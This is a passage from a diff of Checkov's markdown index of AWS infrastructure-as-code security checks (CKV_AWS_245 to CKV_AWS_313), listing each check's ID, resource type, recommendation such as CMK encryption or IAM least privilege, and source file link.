[MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) | +| 648 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) | +| 649 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) | +| 650 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 651 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 652 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 653 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 654 | CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) | +| 655 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 656 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 657 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | +| 658 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | +| 659 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | +| 660 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | +| 661 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | +| 662 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | +| 663 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | +| 664 | CKV_AWS_258 | resource | AWS::Lambda::Url | Ensure that Lambda function URLs AuthType is not None | Cloudformation | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 665 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 666 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | +| 667 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 668 | CKV_AWS_260 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Cloudformation | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 669 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 670 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 671 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 672 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 673 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 674 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | +| 675 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | +| 676 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) | +| 677 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) | +| 678 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py) | +| 679 | CKV_AWS_267 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py) | +| 680 | CKV_AWS_268 | resource | aws_comprehend_entity_recognizer | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py) | +| 681 | CKV_AWS_269 | resource | aws_connect_instance_storage_config | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK | Terraform | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py) | +| 682 | CKV_AWS_270 | resource | aws_connect_instance_storage_config | Ensure Connect Instance S3 Storage Config uses CMK | Terraform | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py) | +| 683 | CKV_AWS_271 | resource | aws_dynamodb_table_replica | Ensure DynamoDB table replica KMS encryption uses CMK | Terraform | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py) | +| 684 | CKV_AWS_272 | resource | aws_lambda_function | Ensure AWS Lambda function is configured to validate code-signing | Terraform | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py) | +| 685 | CKV_AWS_273 | resource | aws_iam_user | Ensure access is controlled through SSO and not AWS IAM defined users | Terraform | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py) | +| 686 | CKV_AWS_274 | resource | aws_iam_group_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 687 | CKV_AWS_274 | resource | aws_iam_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 688 | CKV_AWS_274 | resource | aws_iam_role | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 689 | CKV_AWS_274 | resource | aws_iam_role_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 690 | CKV_AWS_274 | resource | aws_iam_user_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 691 | CKV_AWS_274 | resource | aws_ssoadmin_managed_policy_attachment | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py) | +| 692 | CKV_AWS_275 | data | aws_iam_policy | Disallow policies from using the AWS AdministratorAccess policy | Terraform | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py) | +| 693 | CKV_AWS_276 | resource | aws_api_gateway_method_settings | Ensure Data Trace is not enabled in API Gateway Method Settings | Terraform | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py) | +| 694 | CKV_AWS_277 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 695 | CKV_AWS_277 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 696 | CKV_AWS_277 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port -1 | Terraform | [SecurityGroupUnrestrictedIngressAny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngressAny.py) | +| 697 | CKV_AWS_278 | resource | aws_memorydb_snapshot | Ensure MemoryDB snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [MemoryDBSnapshotEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBSnapshotEncryptionWithCMK.py) | +| 698 | CKV_AWS_279 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is securely encrypted | Terraform | [NeptuneClusterSnapshotEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncrypted.py) | +| 699 | CKV_AWS_280 | resource | aws_neptune_cluster_snapshot | Ensure Neptune snapshot is encrypted by KMS using a customer managed Key (CMK) | Terraform | [NeptuneClusterSnapshotEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterSnapshotEncryptedWithCMK.py) | +| 700 | CKV_AWS_281 | resource | aws_redshift_snapshot_copy_grant | Ensure RedShift snapshot copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterSnapshotCopyGrantEncryptedWithCMK.py) | +| 701 | CKV_AWS_282 | resource | aws_redshiftserverless_namespace | Ensure that Redshift Serverless namespace is encrypted by KMS using a customer managed key (CMK) | Terraform | [RedshiftServerlessNamespaceKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftServerlessNamespaceKMSKey.py) | +| 702 | CKV_AWS_283 | data | aws_iam_policy_document | Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource | Terraform | [IAMPublicActionsPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMPublicActionsPolicy.py) | +| 703 | CKV_AWS_284 | resource | aws_sfn_state_machine | Ensure State Machine has X-Ray tracing enabled | Terraform | [StateMachineXray.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineXray.py) | +| 704 | CKV_AWS_285 | resource | aws_sfn_state_machine | Ensure State Machine has execution history logging enabled | Terraform | [StateMachineLoggingExecutionHistory.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/StateMachineLoggingExecutionHistory.py) | +| 705 | CKV_AWS_286 | resource | aws_iam_group_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 706 | CKV_AWS_286 | resource | aws_iam_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 707 | CKV_AWS_286 | resource | aws_iam_role_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 708 | CKV_AWS_286 | resource | aws_iam_user_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 709 | CKV_AWS_286 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow privilege escalation | Terraform | [IAMPrivilegeEscalation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPrivilegeEscalation.py) | +| 710 | CKV_AWS_287 | resource | aws_iam_group_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 711 | CKV_AWS_287 | resource | aws_iam_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 712 | CKV_AWS_287 | resource | aws_iam_role_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 713 | CKV_AWS_287 | resource | aws_iam_user_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 714 | CKV_AWS_287 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow credentials exposure | Terraform | [IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMCredentialsExposure.py) | +| 715 | CKV_AWS_288 | resource | aws_iam_group_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 716 | CKV_AWS_288 | resource | aws_iam_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 717 | CKV_AWS_288 | resource | aws_iam_role_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 718 | CKV_AWS_288 | resource | aws_iam_user_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 719 | CKV_AWS_288 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow data exfiltration | Terraform | [IAMDataExfiltration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMDataExfiltration.py) | +| 720 | CKV_AWS_289 | resource | aws_iam_group_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 721 | CKV_AWS_289 | resource | aws_iam_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 722 | CKV_AWS_289 | resource | aws_iam_role_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 723 | CKV_AWS_289 | resource | aws_iam_user_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 724 | CKV_AWS_289 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow permissions management / resource exposure without constraints | Terraform | [IAMPermissionsManagement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPermissionsManagement.py) | +| 725 | CKV_AWS_290 | resource | aws_iam_group_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 726 | CKV_AWS_290 | resource | aws_iam_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 727 | CKV_AWS_290 | resource | aws_iam_role_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 728 | CKV_AWS_290 | resource | aws_iam_user_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 729 | CKV_AWS_290 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies does not allow write access without constraints | Terraform | [IAMWriteAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMWriteAccess.py) | +| 730 | CKV_AWS_291 | resource | AWS::MSK::Cluster | Ensure MSK nodes are private | Cloudformation | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 731 | CKV_AWS_291 | resource | aws_msk_cluster | Ensure MSK nodes are private | Terraform | [MSKClusterNodesArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MSKClusterNodesArePrivate.py) | +| 732 | CKV_AWS_292 | resource | aws_docdb_global_cluster | Ensure DocumentDB Global Cluster is encrypted at rest (default is unencrypted) | Terraform | [DocDBGlobalClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBGlobalClusterEncryption.py) | +| 733 | CKV_AWS_293 | resource | aws_db_instance | Ensure that AWS database instances have deletion protection enabled | Terraform | [RDSInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceDeletionProtection.py) | +| 734 | CKV_AWS_294 | resource | aws_cloudtrail_event_data_store | Ensure CloudTrail Event Data Store uses CMK | Terraform | [CloudtrailEventDataStoreUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEventDataStoreUsesCMK.py) | +| 735 | CKV_AWS_295 | resource | aws_datasync_location_object_storage | Ensure DataSync Location Object Storage doesn't expose secrets | Terraform | [DatasyncLocationExposesSecrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DatasyncLocationExposesSecrets.py) | +| 736 | CKV_AWS_296 | resource | aws_dms_endpoint | Ensure DMS endpoint uses Customer Managed Key (CMK) | Terraform | [DMSEndpointUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSEndpointUsesCMK.py) | +| 737 | CKV_AWS_297 | resource | aws_scheduler_schedule | Ensure EventBridge Scheduler Schedule uses Customer Managed Key (CMK) | Terraform | [SchedulerScheduleUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SchedulerScheduleUsesCMK.py) | +| 738 | CKV_AWS_298 | resource | aws_dms_s3_endpoint | Ensure DMS S3 uses Customer Managed Key (CMK) | Terraform | [DMSS3UsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSS3UsesCMK.py) | +| 739 | CKV_AWS_300 | resource | aws_s3_bucket_lifecycle_configuration | Ensure S3 lifecycle configuration sets period for aborting failed uploads | Terraform | [S3AbortIncompleteUploads.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3AbortIncompleteUploads.py) | +| 740 | CKV_AWS_301 | resource | aws_lambda_permission | Ensure that AWS Lambda function is not publicly accessible | Terraform | [LambdaFunctionIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionIsNotPublic.py) | +| 741 | CKV_AWS_302 | resource | aws_db_snapshot | Ensure DB Snapshots are not Public | Terraform | [DBSnapshotsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotsArePrivate.py) | +| 742 | CKV_AWS_303 | resource | aws_ssm_document | Ensure SSM documents are not Public | Terraform | [SSMDocumentsArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SSMDocumentsArePrivate.py) | +| 743 | CKV_AWS_304 | resource | aws_secretsmanager_secret_rotation | Ensure Secrets Manager secrets should be rotated within 90 days | Terraform | [SecretManagerSecret90days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecretManagerSecret90days.py) | +| 744 | CKV_AWS_305 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution has a default root object configured | Terraform | [CloudfrontDistributionDefaultRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionDefaultRoot.py) | +| 745 | CKV_AWS_306 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker notebook instances should be launched into a custom VPC | Terraform | [SagemakerNotebookInCustomVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInCustomVPC.py) | +| 746 | CKV_AWS_307 | resource | aws_sagemaker_notebook_instance | Ensure SageMaker Users should not have root access to SageMaker notebook instances | Terraform | [SagemakerNotebookRoot.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookRoot.py) | +| 747 | CKV_AWS_308 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is set to encrypted | Terraform | [APIGatewayMethodSettingsCacheEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEncrypted.py) | +| 748 | CKV_AWS_309 | resource | aws_apigatewayv2_route | Ensure API GatewayV2 routes specify an authorization type | Terraform | [APIGatewayV2RouteDefinesAuthorizationType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayV2RouteDefinesAuthorizationType.py) | +| 749 | CKV_AWS_310 | resource | aws_cloudfront_distribution | Ensure CloudFront distributions should have origin failover configured | Terraform | [CloudfrontDistributionOriginFailover.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionOriginFailover.py) | +| 750 | CKV_AWS_311 | resource | aws_codebuild_project | Ensure that CodeBuild S3 logs are encrypted | Terraform | [CodebuildS3LogsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodebuildS3LogsEncrypted.py) | +| 751 | CKV_AWS_312 | resource | aws_elastic_beanstalk_environment | Ensure Elastic Beanstalk environments have enhanced health reporting enabled | Terraform | [ElasticBeanstalkUseEnhancedHealthChecks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticBeanstalkUseEnhancedHealthChecks.py) | +| 752 | CKV_AWS_313 | resource | aws_rds_cluster | Ensure RDS cluster configured to copy tags to snapshots | Terraform | 